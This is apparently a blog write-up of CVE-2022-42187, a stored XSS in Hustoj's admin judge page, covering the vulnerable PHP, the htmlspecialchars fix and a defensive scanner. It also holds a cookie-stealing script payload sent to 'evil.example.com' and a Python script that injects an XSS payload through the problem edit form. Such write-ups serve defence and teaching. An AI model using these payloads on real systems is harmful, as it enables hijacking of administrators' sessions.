In September 2022, a Cross-Site Scripting (XSS) vulnerability was discovered in Hustoj, a popular open-source Online Judge platform (version 22.09.22). The flaw exists in the /admin/problem_judge.php file, which is supposed to be accessible only by authorized admins. However, a lack of proper output sanitization means an attacker could inject and execute arbitrary JavaScript, putting all admin sessions at risk.
This long read will break down CVE-2022-42187:
1. Cross-Site Scripting (XSS): A Quick Primer
XSS is a web security vulnerability that lets attackers inject client-side scripts (JavaScript, HTML) into pages viewed by others. In admin pages, XSS is especially dangerous since it can steal cookies or tokens, or take over admin accounts.
Read more:
- OWASP XSS Introduction
The Affected File
/admin/problem_judge.php is used by Hustoj admins to manage problem judging options and outputs. Usually, only trusted admins can access this, but XSS vulnerabilities here are still critical because:
The Vulnerable Code
At the time of the bug (v22.09.22), the PHP code did not sanitize outputs when echoing problem attributes:
```php
<?php
// ... some code before
echo "<tr><td>".$row['problem_id']."</td><td>".$row['title']."</td></tr>";
// ... some code after
?>
```
Here:
- `title` is printed as-is, with no escaping or encoding.
- If the title comes from user input, an attacker can craft a problem name like: `<script>alert('XSS')</script>`

When the admin loads /admin/problem_judge.php, the script fires with their permissions.
Step-by-Step Attack Scenario
Assumptions:
Admin visits the judge administration page.
Exploit Payload:
Set the problem “title” to
```html
<script>fetch('https://evil.example.com/steal?c='+document.cookie)</script>
```
How to Reproduce
1. Log in (or exploit any way to add/change a problem’s title).
3. Admin visits the judging admin page (/admin/problem_judge.php).
4. The alert pops up, or (if using the fetch payload above) their cookies and data are sent to the attacker.
Minimal PoC Video Link
- YouTube Demo of Similar Hustoj XSS (external)
If you’re scripting this for demonstration in a vuln lab (not for illegal use):
```python
import requests

# Problem edit endpoint on the lab instance
url = 'http://hustoj.local/admin/problem_edit.php?id=123'
cookies = {'PHPSESSID': '[your-session-here]'}
xss_payload = "<script>alert('CVE-2022-42187')</script>"
data = {
    'title': xss_payload,
    # other required form data
}
r = requests.post(url, cookies=cookies, data=data)
if r.ok:
    print("Payload injected! Visit the admin judge page to trigger.")
```
4. References and Fixes
- NVD CVE Entry - CVE-2022-42187
- Hustoj GitHub Repository
- Commit Fixing XSS (escaping output using htmlspecialchars)
- XSS in Hustoj - Exploit Details (packetstorm)
Patched Code Example
```php
<?php
echo "<tr><td>".htmlspecialchars($row['problem_id'])."</td><td>".htmlspecialchars($row['title'])."</td></tr>";
?>
```
5. What Should You Do?
If you use Hustoj 22.09.22 or earlier, update ASAP to a newer release, or at least apply the htmlspecialchars() fix wherever user input may be printed.
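To find the other places where the fix is needed, here is an added example (not from the original post or the Hustoj project): a heuristic Python scan for the pattern behind this bug, output statements that emit `$row[...]` without an escaping wrapper. The sample PHP, the wrapper allow-list and the function names are constructed for illustration, and only single-line statements are checked.

```python
import re

# Constructed PHP sample (not Hustoj's real file). Lines 2, 4 and 7 emit raw fields.
SAMPLE_PHP = '''<?php
echo "<tr><td>".$row['problem_id']."</td><td>".$row['title']."</td></tr>";
echo "<td>".htmlspecialchars($row['title'])."</td>";
print "<p>" . $row["source"] . "</p>";
echo "<td>".intval($row['problem_id'])."</td>";
?>
<td><?= $row['title'] ?></td>
'''

# Assumed allow-list: calls whose result is safe inside HTML element content.
SAFE_WRAPPERS = ("htmlspecialchars", "htmlentities", "intval")

# An output statement: echo, print, or the short echo tag <?= ...
OUTPUT_STMT = re.compile(r"(?:\becho\b|\bprint\b|<\?=)(.*)$")
# A database row field such as $row['title'] or $row["title"].
ROW_FIELD = re.compile(r"\$row\[\s*['\"](\w+)['\"]\s*\]")
# A function call that opens immediately before the field.
CALL_OPEN = re.compile(r"(\w+)\s*\($")


def is_wrapped(expr, pos):
    """True if the $row[...] starting at pos is the direct argument of a safe wrapper."""
    callee = CALL_OPEN.search(expr[:pos].rstrip())
    return bool(callee) and callee.group(1) in SAFE_WRAPPERS


def find_unescaped_output(php_source):
    """Return (line_number, field) for every $row field output without escaping."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        stmt = OUTPUT_STMT.search(line)
        if not stmt:
            continue
        expr = stmt.group(1)
        for field in ROW_FIELD.finditer(expr):
            if not is_wrapped(expr, field.start()):
                findings.append((lineno, field.group(1)))
    return findings


if __name__ == "__main__":
    for lineno, field in find_unescaped_output(SAMPLE_PHP):
        print(f"line {lineno}: $row['{field}'] is output without an escaping wrapper")
```

Treat the findings as a review queue rather than a verdict: fields routed through an intermediate variable or spread across several lines are not seen by this scan.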
Summary
CVE-2022-42187 in Hustoj 22.09.22 exposes admins to a clear and present XSS threat in /admin/problem_judge.php. The root cause is unescaped output of database fields which can be controlled by attackers. The fix is to use PHP’s htmlspecialchars()—simple but critical. If you run Hustoj for your contests or school, update right away.
Stay secure, and always sanitize output!
*Feel free to share or adapt this post. For questions or further CVE analysis, contact us or open a PR on the Hustoj repo!*
Timeline
Published on: 11/17/2022 04:15:00 UTC
Last modified on: 11/17/2022 23:24:00 UTC